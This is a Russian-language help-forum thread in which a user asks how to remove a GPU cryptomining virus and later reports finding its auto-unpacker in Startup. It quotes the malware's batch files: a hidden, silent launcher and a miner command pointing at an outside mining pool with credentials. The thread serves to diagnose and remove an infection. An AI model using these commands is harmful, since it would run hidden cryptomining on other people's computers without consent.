Вирус - майнинг на чужой видеокарте. Нагрузка GPU в простое...

Появился вирус нагружающий GPU. Через Process Explorer нашел путь до исполняемых файлов: "c:\Windows\API\". В нем очень много файлов. Но вот главные из них:
[LIST=1][*]1.bat[CODE]hstart.exe /NOCONSOLE /SILENT "C:\Windows\API\Lark.bat"[/CODE][*]Lark.bat[CODE]systems --keccak -o http://pool.flylark.net:8332 -u admin.windows -p microsoft -w 32[/CODE][/LIST]
Понятно, что на мне майнят на пулле [удалено]. Похожий вирус я уже находил, и удалил его из %AppData%/Roaming/*****/*****.js - файл формата JavaScript, который и создавал исполняемый файл для запуска.
Сейчас же я не могу его найти. Помогите пожалуйста, как можно определить откуда он создается?

PS: после удаления папки "c:\Windows\API\" и перезагрузке системы все файлы пересоздаются.

Уважаемый(ая) [B]DarkSector[/B], спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в [URL="http://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="http://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].

Авто распаковщик был найден в "Автозагрузке". После удаления мучение мое прекратилось. 8)